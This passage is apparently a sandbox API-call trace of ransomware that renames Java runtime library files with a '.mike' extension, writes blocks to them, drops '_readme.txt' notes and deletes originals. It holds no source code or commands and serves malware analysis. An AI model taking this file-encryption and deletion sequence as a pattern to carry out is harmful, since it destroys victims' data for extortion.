lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0114.512] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\alt-rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\alt-rt.jar.mike", lpFilePart=0x0) returned 0x34 [0114.512] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\alt-rt.jar", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\alt-rt.jar", lpFilePart=0x0) returned 0x2f [0114.528] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\alt-rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\alt-rt.jar.mike", lpFilePart=0x0) returned 0x34 [0114.528] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\alt-rt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\alt-rt.jar.mike", lpFilePart=0x0) returned 0x34 [0114.528] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\alt-rt.jar", dwFileAttributes=0x80) returned 1 [0114.530] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\_readme.txt", lpFilePart=0x0) returned 0x30 [0114.532] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0114.533] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\charsets.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\charsets.jar.mike", lpFilePart=0x0) returned 0x36 [0114.533] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\charsets.jar", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\charsets.jar", lpFilePart=0x0) returned 0x31 [0115.034] WriteFile (in: hFile=0x288, lpBuffer=0x227ee5c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x227ee5c*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0115.035] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\charsets.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\charsets.jar.mike", lpFilePart=0x0) returned 0x36 [0115.035] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\charsets.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\charsets.jar.mike", lpFilePart=0x0) returned 0x36 [0115.036] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\charsets.jar", dwFileAttributes=0x80) returned 1 [0115.040] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\_readme.txt", lpFilePart=0x0) returned 0x30 [0115.042] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0115.043] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy.jar.mike", lpFilePart=0x0) returned 0x34 [0115.043] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy.jar", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy.jar", lpFilePart=0x0) returned 0x2f [0115.703] WriteFile (in: hFile=0x288, lpBuffer=0x22bc18c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x22bc18c*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0115.705] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy.jar.mike", lpFilePart=0x0) returned 0x34 [0115.705] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy.jar.mike", lpFilePart=0x0) returned 0x34 [0115.705] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy.jar", dwFileAttributes=0x80) returned 1 [0115.717] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\_readme.txt", lpFilePart=0x0) returned 0x30 [0115.720] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0115.720] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\javaws.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\javaws.jar.mike", lpFilePart=0x0) returned 0x34 [0115.720] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\javaws.jar", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\javaws.jar", lpFilePart=0x0) returned 0x2f [0115.820] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\javaws.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\javaws.jar.mike", lpFilePart=0x0) returned 0x34 [0115.820] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\javaws.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\javaws.jar.mike", lpFilePart=0x0) returned 0x34 [0115.820] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\javaws.jar", dwFileAttributes=0x80) returned 1 [0115.828] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\_readme.txt", lpFilePart=0x0) returned 0x30 [0115.830] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0115.831] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jce.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\jce.jar.mike", lpFilePart=0x0) returned 0x31 [0115.831] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jce.jar", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\jce.jar", lpFilePart=0x0) returned 0x2c [0115.842] WriteFile (in: hFile=0x288, lpBuffer=0x21d5a1c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x21d5a1c*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0115.843] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jce.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\jce.jar.mike", lpFilePart=0x0) returned 0x31 [0115.843] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jce.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\jce.jar.mike", lpFilePart=0x0) returned 0x31 [0115.843] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jce.jar", dwFileAttributes=0x80) returned 1 [0115.847] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0115.847] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr.jar.mike", lpFilePart=0x0) returned 0x31 [0115.848] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr.jar", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr.jar", lpFilePart=0x0) returned 0x2c [0115.904] WriteFile (in: hFile=0x288, lpBuffer=0x2284d74*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x2284d74*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0115.905] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr.jar.mike", lpFilePart=0x0) returned 0x31 [0115.905] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr.jar.mike", lpFilePart=0x0) returned 0x31 [0115.905] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr.jar", dwFileAttributes=0x80) returned 1 [0115.910] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\_readme.txt", lpFilePart=0x0) returned 0x30 [0115.914] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0115.914] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfxrt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfxrt.jar.mike", lpFilePart=0x0) returned 0x33 [0115.914] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfxrt.jar", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfxrt.jar", lpFilePart=0x0) returned 0x2e [0117.798] WriteFile (in: hFile=0x288, lpBuffer=0x21480bc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x21480bc*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0117.799] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfxrt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfxrt.jar.mike", lpFilePart=0x0) returned 0x33 [0117.799] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfxrt.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfxrt.jar.mike", lpFilePart=0x0) returned 0x33 [0117.800] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfxrt.jar", dwFileAttributes=0x80) returned 1 [0117.808] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\_readme.txt", lpFilePart=0x0) returned 0x30 [0117.811] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0117.811] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jsse.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\jsse.jar.mike", lpFilePart=0x0) returned 0x32 [0117.811] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jsse.jar", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\jsse.jar", lpFilePart=0x0) returned 0x2d [0117.874] WriteFile (in: hFile=0x288, lpBuffer=0x21f1790*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x21f1790*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0117.875] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jsse.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\jsse.jar.mike", lpFilePart=0x0) returned 0x32 [0117.875] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jsse.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\jsse.jar.mike", lpFilePart=0x0) returned 0x32 [0117.875] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jsse.jar", dwFileAttributes=0x80) returned 1 [0117.881] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\_readme.txt", lpFilePart=0x0) returned 0x30 [0117.893] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt", lpFilePart=0x0) returned 0x32 [0117.893] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt", lpFilePart=0x0) returned 0x32 [0117.894] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0117.894] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0117.894] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jvm.hprof.txt"), fInfoLevelId=0x0, lpFileInformation=0x21f64f4 | out: lpFileInformation=0x21f64f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x744bcf20, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x744bcf20, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x744bcf20, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x1082)) returned 1 [0117.894] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt", lpFilePart=0x0) returned 0x32 [0117.894] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jvm.hprof.txt"), fInfoLevelId=0x0, lpFileInformation=0x21f67c0 | out: lpFileInformation=0x21f67c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x744bcf20, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x744bcf20, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x744bcf20, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x1082)) returned 1 [0117.895] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt", lpFilePart=0x0) returned 0x32 [0117.895] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt.mike", lpFilePart=0x0) returned 0x37 [0117.895] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt.mike" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jvm.hprof.txt.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0117.895] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt", lpFilePart=0x0) returned 0x32 [0117.895] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt", lpFilePart=0x0) returned 0x32 [0117.896] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt", lpFilePart=0x0) returned 0x32 [0117.896] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt.mike", lpFilePart=0x0) returned 0x37 [0117.896] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt.mike" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jvm.hprof.txt.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0117.896] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt.mike", lpFilePart=0x0) returned 0x37 [0117.902] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt.mike", lpFilePart=0x0) returned 0x37 [0117.902] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt.mike", lpFilePart=0x0) returned 0x37 [0117.902] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt", dwFileAttributes=0x80) returned 1 [0117.902] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jvm.hprof.txt")) returned 1 [0117.904] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\_readme.txt", lpFilePart=0x0) returned 0x30 [0117.906] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0117.907] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\management-agent.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\management-agent.jar.mike", lpFilePart=0x0) returned 0x3e [0117.907] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\management-agent.jar", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\management-agent.jar", lpFilePart=0x0) returned 0x39 [0117.910] WriteFile (in: hFile=0x288, lpBuffer=0x22152a4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x22152a4*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0117.911] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\management-agent.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\management-agent.jar.mike", lpFilePart=0x0) returned 0x3e [0117.911] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\management-agent.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\management-agent.jar.mike", lpFilePart=0x0) returned 0x3e [0117.911] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\management-agent.jar", dwFileAttributes=0x80) returned 1 [0117.912] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\management-agent.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management-agent.jar")) returned 1 [0117.913] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\_readme.txt", lpFilePart=0x0) returned 0x30 [0117.915] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0117.916] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\plugin.jar.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\plugin.jar.mike", lpFilePart=0x0) returned 0x34 [0117.916] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\plugin.jar", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files 